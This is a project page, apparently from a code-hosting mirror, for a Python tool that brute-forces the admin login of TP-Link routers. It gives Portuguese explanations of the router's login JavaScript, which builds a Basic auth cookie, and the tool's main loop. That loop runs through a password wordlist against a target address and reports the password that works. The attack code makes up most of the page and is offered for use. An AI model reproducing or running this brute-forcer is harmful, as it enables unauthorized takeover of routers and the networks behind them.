toolsrouterbrute

Tool to perform brute force attack on TPLink routers

MIT License

Stars
12
View Code on GitHub
Ecosystems: Python
  • Capturando url atual e subscrevendo o valor para o link definido no replace e redirecionando o usúario.
  • Criando uma variavél isLocker e atribuindo o valor false a mesma.
  • Deletando o cookie Authorization, vulgo responsável pela a autenticação.
var url = window.location.href;

if (url.indexOf("tplinklogin.net") >= 0)
{
    url = url.replace("tplinklogin.net", "tplinkwifi.net");
    window.location = url;
}

var isLocked = false;

deleteCookie("Authorization");


function Base64Encoding(input)
{
	var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
	var output = "";
	var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
	var i = 0;
	input = utf8_encode(input);
	while (i < input.length)
	{
		chr1 = input.charCodeAt(i++);
		chr2 = input.charCodeAt(i++);
		chr3 = input.charCodeAt(i++);
		enc1 = chr1 >> 2;
		enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
		enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
		enc4 = chr3 & 63;

		if (isNaN(chr2))
		{
			enc3 = enc4 = 64;
		}
		else if (isNaN(chr3))
		{
			enc4 = 64;
		}
		output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
	}
	return output;
}

Função que monitora o clique de login e captura os dados informado pelo usúario


function PCWin(event)
{
	if (event.keyCode == 13)
	{
		PCSubWin();
	}
}

function PCSubWin()
{
    // Verifica se o usúario não está bloqueado por alguns segundos
    if (isLocked == true)
     {
	return;
     }
    // Criando uma variavel que receberá o base64 referente a autenticação
    // E criando duas variavels para receber o userName e o password
    var auth;
    var password = $("pcPassword").value;
    var userName = $("userName").value;

    // Concatena a palavra "Basic" com a hash base64 de userName com ":" e o password
    auth = "Basic "+Base64Encoding(userName+":"+password);
    // Atribui o valor ao Cookie do navegador com a chave Authorization e com o auth como conteúdo
    document.cookie = "Authorization=" + auth;
    // Recarrega a página
    window.location.reload();
}

Entendendo o funcionamento do script trb.py


def main():
    wordlist = open(sys.argv[3], 'r')
    count = 0
    for i in wordlist:

        login = str(sys.argv[1])
        password = i.rstrip()
        auth  = "Basic "

        authEncode = auth+base64.b64encode(login+':'+password)

        cookie = {"Authorization": authEncode}

        try:
            response = r.get('http://'+sys.argv[2], cookies=cookie)
        except:
            splash()
            print("\tError to connect: " + sys.argv[2])
            exit(1)

        if response.content.count('id="userName"') != 1:
            os.system('setterm -cursor on')
            print('\n\tPassword Found =====> ' + password)
            exit(0)

        os.system("clear")
        splash()
        count = count + 1
        print('\t[ '+ str(count) + ' ] Password not found ===> ' + password)
Related Projects
Kill-Router-

Ferramenta para quebrar senhas administrativas de roteadores Wireless, routers, switches e outras...

14 Dec 2015 98
calcular-digitos-verificar-cpf

Baixar ferramenta CLI Linux aqui! - Como calcular os dígitos verificadores de um CPF; em Python, ...

14 Feb 2022 3
AllWhatsPy

PT-BR | Whatsapp Wrapper para automação de Envio e Análise de Mensagens com Python e Selenium

20 Jan 2023 56
textAnalysis

Programa em python que realisa análise em texto usando recursos da API Algorithmia.

14 Sep 2019 8
itauscraper

Scraper para baixar seus extratos do Itaú com um comando.

21 Jul 2017 196